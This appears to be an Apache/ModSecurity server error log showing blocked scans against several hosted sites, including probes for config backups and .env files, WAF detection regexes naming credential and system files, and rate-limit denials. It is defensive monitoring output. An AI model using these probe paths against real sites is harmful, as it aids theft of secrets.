[Tue May 26 19:53:55.372416 2026] [security2:error] [pid 93576:tid 93740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-mDRMqfxdEDkoszMCgAAABw"]
[Tue May 26 19:53:55.380538 2026] [security2:error] [pid 93868:tid 94378] [client 185.177.72.53:63430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin/new/config.bak"] [unique_id "ahWs-0qK9k_ZUB2Vp25FLAAAAgc"]
[Tue May 26 19:53:55.390258 2026] [security2:error] [pid 86490:tid 86652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-lZMwN0DpLVWo6KwmwAAAKU"]
[Tue May 26 19:53:55.390515 2026] [security2:error] [pid 93576:tid 93748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-mDRMqfxdEDkoszMDgAAACQ"]
[Tue May 26 19:53:55.404257 2026] [security2:error] [pid 86490:tid 86632] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-lZMwN0DpLVWo6KwlgAAAJE"]
[Tue May 26 19:53:55.407239 2026] [security2:error] [pid 93868:tid 94332] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-UqK9k_ZUB2Vp25FBQAAAdk"]
[Tue May 26 19:53:55.408728 2026] [security2:error] [pid 93868:tid 94364] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-kqK9k_ZUB2Vp25FGQAAAfk"]
[Tue May 26 19:53:55.410217 2026] [security2:error] [pid 86490:tid 86709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-VZMwN0DpLVWo6KwTwAAAN4"]
[Tue May 26 19:53:55.414128 2026] [security2:error] [pid 86490:tid 86683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-lZMwN0DpLVWo6KwmgAAAMQ"]
[Tue May 26 19:53:55.414734 2026] [security2:error] [pid 86490:tid 86733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-lZMwN0DpLVWo6KwoQAAAPY"]
[Tue May 26 19:53:55.415938 2026] [security2:error] [pid 93868:tid 94292] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-UqK9k_ZUB2Vp25FAwAAAbE"]
[Tue May 26 19:53:55.419015 2026] [security2:error] [pid 86490:tid 86699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-lZMwN0DpLVWo6KwnAAAANQ"]
[Tue May 26 19:53:55.425896 2026] [security2:error] [pid 86490:tid 86707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-lZMwN0DpLVWo6KwmAAAANw"]
[Tue May 26 19:53:55.426698 2026] [security2:error] [pid 93868:tid 94346] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-kqK9k_ZUB2Vp25FEgAAAec"]
[Tue May 26 19:53:55.428694 2026] [security2:error] [pid 93868:tid 94372] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-kqK9k_ZUB2Vp25FGgAAAgE"]
[Tue May 26 19:53:55.440479 2026] [security2:error] [pid 86490:tid 86649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-lZMwN0DpLVWo6KwsQAAAKI"]
[Tue May 26 19:53:55.444827 2026] [security2:error] [pid 86490:tid 86710] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-lZMwN0DpLVWo6KwrAAAAN8"]
[Tue May 26 19:53:55.450564 2026] [security2:error] [pid 93868:tid 94284] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-kqK9k_ZUB2Vp25FDwAAAak"]
[Tue May 26 19:53:55.547178 2026] [security2:error] [pid 93868:tid 94311] [client 185.177.72.53:63430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/lemonldap-ng-fr-doc/.env"] [unique_id "ahWs-0qK9k_ZUB2Vp25FLwAAAcQ"]
[Tue May 26 19:53:55.715257 2026] [qos:error] [pid 93867:tid 94169] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs-5CDfrjqoHpuuBKsCgAAAWU
[Tue May 26 19:53:55.715593 2026] [qos:error] [pid 93868:tid 94303] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWs-0qK9k_ZUB2Vp25FMwAAAbw
[Tue May 26 19:53:55.715814 2026] [qos:error] [pid 93867:tid 94043] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=103, c=50.87.254.159, id=ahWs-5CDfrjqoHpuuBKsBgAAASc
[Tue May 26 19:53:55.715843 2026] [qos:error] [pid 93868:tid 94265] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=104, c=50.87.254.159, id=ahWs-0qK9k_ZUB2Vp25FNAAAAZY
[Tue May 26 19:53:55.716229 2026] [qos:error] [pid 93868:tid 94291] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWs-0qK9k_ZUB2Vp25FNQAAAbA
[Tue May 26 19:53:55.716503 2026] [qos:error] [pid 93867:tid 94044] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWs-5CDfrjqoHpuuBKsDAAAASg
[Tue May 26 19:53:55.715818 2026] [qos:error] [pid 93867:tid 94127] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=103, c=50.87.254.159, id=ahWs-5CDfrjqoHpuuBKsCwAAAVI
[Tue May 26 19:53:55.715594 2026] [qos:error] [pid 93867:tid 94161] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWs-5CDfrjqoHpuuBKsCQAAAWI
[Tue May 26 19:53:55.716549 2026] [qos:error] [pid 93867:tid 94133] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=103, c=50.87.254.159, id=ahWs-5CDfrjqoHpuuBKsDQAAAVU
[Tue May 26 19:53:55.726918 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs-2DRMqfxdEDkoszMLwAAACA
[Tue May 26 19:53:55.810016 2026] [proxy:error] [pid 86490:tid 86746] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:53:55.810065 2026] [proxy_http:error] [pid 86490:tid 86746] [client 167.71.5.127:60970] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:53:55.810734 2026] [proxy:error] [pid 86490:tid 86746] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:53:55.810771 2026] [proxy_http:error] [pid 86490:tid 86746] [client 167.71.5.127:60970] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:53:55.865833 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs-1ZMwN0DpLVWo6KxJAAAAJo
[Tue May 26 19:53:55.865902 2026] [qos:error] [pid 86490:tid 86682] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=103, c=45.148.10.120, id=ahWs-1ZMwN0DpLVWo6KxJQAAAMM
[Tue May 26 19:53:55.866034 2026] [qos:error] [pid 86490:tid 86625] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-1ZMwN0DpLVWo6KxIwAAAIo
[Tue May 26 19:53:55.866313 2026] [qos:error] [pid 86490:tid 86727] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-1ZMwN0DpLVWo6KxJgAAAPA
[Tue May 26 19:53:55.867598 2026] [qos:error] [pid 86490:tid 86716] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-1ZMwN0DpLVWo6KxJwAAAOU
[Tue May 26 19:53:55.871416 2026] [qos:error] [pid 93576:tid 93820] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-2DRMqfxdEDkoszMMQAAAGw
[Tue May 26 19:53:55.872497 2026] [qos:error] [pid 86490:tid 86688] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-1ZMwN0DpLVWo6KxKQAAAMk
[Tue May 26 19:53:55.872512 2026] [qos:error] [pid 86490:tid 86673] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs-1ZMwN0DpLVWo6KxKwAAALo
[Tue May 26 19:53:55.872920 2026] [qos:error] [pid 86490:tid 86710] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-1ZMwN0DpLVWo6KxKgAAAN8
[Tue May 26 19:53:55.877108 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-1ZMwN0DpLVWo6KxLAAAAIY
[Tue May 26 19:53:56.016015 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxLQAAAMI
[Tue May 26 19:53:56.016211 2026] [qos:error] [pid 86490:tid 86739] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxLgAAAPw
[Tue May 26 19:53:56.018619 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxLwAAAOA
[Tue May 26 19:53:56.019457 2026] [qos:error] [pid 86490:tid 86667] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxMAAAALQ
[Tue May 26 19:53:56.022496 2026] [qos:error] [pid 86490:tid 86636] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxMQAAAJU
[Tue May 26 19:53:56.023420 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_GDRMqfxdEDkoszMMgAAAGs
[Tue May 26 19:53:56.024121 2026] [qos:error] [pid 86490:tid 86706] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxMgAAANs
[Tue May 26 19:53:56.025760 2026] [qos:error] [pid 86490:tid 86678] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxMwAAAL8
[Tue May 26 19:53:56.027094 2026] [qos:error] [pid 86490:tid 86680] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxNQAAAME
[Tue May 26 19:53:56.027586 2026] [qos:error] [pid 86490:tid 86724] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxNAAAAO0
[Tue May 26 19:53:56.165557 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxOgAAAI4
[Tue May 26 19:53:56.165850 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxOwAAALE
[Tue May 26 19:53:56.166756 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxPAAAALE
[Tue May 26 19:53:56.167725 2026] [qos:error] [pid 86490:tid 86721] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxPgAAAOo
[Tue May 26 19:53:56.174952 2026] [qos:error] [pid 93576:tid 93766] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_GDRMqfxdEDkoszMMwAAADY
[Tue May 26 19:53:56.175857 2026] [qos:error] [pid 86490:tid 86734] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxQAAAAPc
[Tue May 26 19:53:56.176111 2026] [qos:error] [pid 86490:tid 86746] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxQQAAAQM
[Tue May 26 19:53:56.176961 2026] [qos:error] [pid 86490:tid 86736] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxQgAAAPk
[Tue May 26 19:53:56.181071 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxQwAAANk
[Tue May 26 19:53:56.182735 2026] [qos:error] [pid 86490:tid 86649] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxRAAAAKI
[Tue May 26 19:53:56.224478 2026] [security2:error] [pid 93868:tid 94325] [client 185.177.72.53:63430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/env/wp-config.bak"] [unique_id "ahWs_EqK9k_ZUB2Vp25FPAAAAdI"]
[Tue May 26 19:53:56.260895 2026] [security2:error] [pid 93868:tid 94008] [remote 49.12.3.147:33164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWs_EqK9k_ZUB2Vp25FOwABrAg"]
[Tue May 26 19:53:56.278704 2026] [security2:error] [pid 93868:tid 94355] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-kqK9k_ZUB2Vp25FEQAAAfA"]
[Tue May 26 19:53:56.283921 2026] [security2:error] [pid 93576:tid 93787] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-mDRMqfxdEDkoszMFgAAAEs"]
[Tue May 26 19:53:56.292250 2026] [security2:error] [pid 86490:tid 86677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-lZMwN0DpLVWo6KwtwAAAL4"]
[Tue May 26 19:53:56.295709 2026] [security2:error] [pid 86490:tid 86627] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-lZMwN0DpLVWo6KwqwAAAIw"]
[Tue May 26 19:53:56.298484 2026] [security2:error] [pid 93868:tid 94319] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-kqK9k_ZUB2Vp25FGwAAAcw"]
[Tue May 26 19:53:56.300815 2026] [security2:error] [pid 86490:tid 86646] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-lZMwN0DpLVWo6KwrQAAAJ8"]
[Tue May 26 19:53:56.302455 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-mDRMqfxdEDkoszMFQAAAAk"]
[Tue May 26 19:53:56.309643 2026] [security2:error] [pid 93868:tid 94352] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-kqK9k_ZUB2Vp25FGAAAAe0"]
[Tue May 26 19:53:56.310994 2026] [security2:error] [pid 86490:tid 86659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-lZMwN0DpLVWo6KwwgAAAKw"]
[Tue May 26 19:53:56.311279 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-mDRMqfxdEDkoszMFwAAAAE"]
[Tue May 26 19:53:56.324247 2026] [security2:error] [pid 86490:tid 86714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-lZMwN0DpLVWo6KwtgAAAOM"]
[Tue May 26 19:53:56.324308 2026] [security2:error] [pid 86490:tid 86722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-lZMwN0DpLVWo6KwuQAAAOs"]
[Tue May 26 19:53:56.328169 2026] [security2:error] [pid 93867:tid 94235] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-pCDfrjqoHpuuBKr6wAAAYM"]
[Tue May 26 19:53:56.348695 2026] [security2:error] [pid 86490:tid 86631] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-lZMwN0DpLVWo6KwuwAAAJA"]
[Tue May 26 19:53:56.376007 2026] [security2:error] [pid 93867:tid 94046] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKr_gAAASo"]
[Tue May 26 19:53:56.397680 2026] [security2:error] [pid 86490:tid 86743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-1ZMwN0DpLVWo6KxFgAAAQA"]
[Tue May 26 19:53:56.409161 2026] [security2:error] [pid 93576:tid 93729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-2DRMqfxdEDkoszMIgAAABE"]
[Tue May 26 19:53:56.414377 2026] [security2:error] [pid 93867:tid 94222] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKr_wAAAX0"]
[Tue May 26 19:53:56.415494 2026] [security2:error] [pid 93867:tid 94151] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKsDgAAAV0"]
[Tue May 26 19:53:56.421158 2026] [security2:error] [pid 93576:tid 93782] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-2DRMqfxdEDkoszMIwAAAEY"]
[Tue May 26 19:53:56.424285 2026] [security2:error] [pid 86490:tid 86696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-1ZMwN0DpLVWo6Kw6wAAANE"]
